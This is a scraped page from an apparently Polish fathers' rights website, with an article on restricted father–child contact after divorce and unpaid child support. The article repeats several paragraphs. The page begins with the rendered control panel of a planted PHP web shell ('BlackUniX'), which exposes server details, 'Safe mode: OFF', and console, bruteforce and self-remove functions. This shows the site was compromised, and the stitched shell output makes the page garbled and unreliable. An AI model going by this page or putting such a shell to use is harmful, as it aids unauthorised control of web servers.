W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-23 11:25:16
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.104.202
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Pogrzeb ojca.
20.06.2007.

Ograniczanie kontaktów z dzieckiem jest często formą przedłużania konfliktu, który doprowadził do rozwodu. To z kolei jest często tłem do kolejnego problemu, jakim jest niealimentacja.

Nie spełnianie obowiązku alimentacyjnego wobec nieletnich dzieci jest w świetle polskiego prawa przestępstwem, ale mimo to mężczyźni, w źle rozumianej zemście na byłej małżonce, za utrudnianie im kontaktu z dzieckiem często nie płaca alimentów.

Za to na gruncie polskiego prawa, ograniczanie kontaktów z dzieckiem jednemu rodzicowi przez drugiego nie jest przestępstwem, nie ma więc skutecznego sposobu by kontakty te egzekwować!

(...)

W roku 2006 orzeczono w Polsce blisko 100 000 rozwodów, przy tym coraz więcej dzieci rodzi się w związkach nieformalnych. Jeśli skala wzrostu obu procesów utrzyma się, za kilka lat będziemy być może mieli do czynienia z wyrównaniem się liczby dzieci wychowujących się w rodzinach pełnych i tych, które dorastają w rodzinach niepełnych (najczęściej bez ojca), lub w konkubinatach.


Z problemem rozpadu małżeństwa wiąże się niestety bardzo bolesny problem oddzielenia dzieci pochodzących ze związku małżeńskiego od ojców. Tylko około 4% ojców uzyskuje bezpośrednią pieczę nad swoim potomstwem po rozwodzie. Nie jest to jednak najbardziej jaskrawy przykład oddzielania dzieci od ojców. Trzeba przyznać, że mężczyźni, na skutek utrwalonej, negatywnej opinii na temat sądownictwa rodzinnego, dość rzadko występują o przejęcie bezpośredniej opieki nad dzieckiem w procesie rozwodowym. Istną plaga jest zjawisko nieuzasadnionego ograniczania kontaktów ojca z dzieckiem po rozwodzie (w sytuacji gdy dziecko zamieszkuje przy matce). Dzieje się tak często nawet pomimo ustalenia przez sąd sposobu tych kontaktów.


Na gruncie polskiego prawa, ograniczanie kontaktów z dzieckiem jednemu rodzicowi przez drugiego nie jest przestępstwem. Nie ma więc skutecznego sposobu by kontakty te egzekwować.

Ograniczanie kontaktów z dzieckiem jest często formą przedłużania konfliktu, który doprowadził do rozwodu. To z kolei jest często tłem do kolejnego problemu, jakim jest niealimentacja. Nie spełnianie obowiązku alimentacyjnego wobec nieletnich dzieci jest w świetle polskiego prawa przestępstwem, ale mimo to mężczyźni, w źle rozumianej zemście na byłej małżonce, za utrudnianie im kontaktu z dzieckiem często nie płaca alimentów.


(...)


Krótko mówiąc, ojcowie, którym ogranicza się prawo do kontaktu z dziećmi mniej chętnie płacą alimenty.


(...)


Aby jakakolwiek zmiana była w tym zakresie możliwa, konieczne jest dostrzeżenie przez osoby kreujących politykę rodzinną pełnej skali i właściwego charakteru zjawiska dyskryminowania ojców w ich prawach do kontaku z dziećmi. Przecież, oznacza to również dyskryminację dzieci w kontaktach z ojcami po rozwodzie, lub rozpadzie związku partnerskiego.

Wszyscy, jako społeczeństwo musimy wreszcie dostrzec, jak niekorzystne jest podtrzymywania stereotypu ojca - jako rodzica drugiej kategorii.

Działania na rzecz wzmacniania więź ojców z dziećmi (szczególnie po rozwodzie) wpłynęłoby wprost na wyższy poziom socjalizacji młodego pokolenia, lepszą identyfikację z rolami partnerskimi, jakie w przyszłości, kiedy dorosną, będą młodzi ludzie pełnić w swoich związkach i inne dobrze znane i wielokrotnie opisywane dyspozycje psychiczne. Miałyby też bezpośredni wpływ na poprawę sytuacji materialnej dzieci z rodzin niepełnych, gdyż, jak wspomnieliśmy wyżej, mężczyźni, którzy lepiej identyfikują się z rolą ojca, i w swoich prawach do kontaktu z dziećmi nie są po rozwodzie dyskryminowani, zazwyczaj bez oporu płacą alimenty.

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 1 gość
23.07.2018.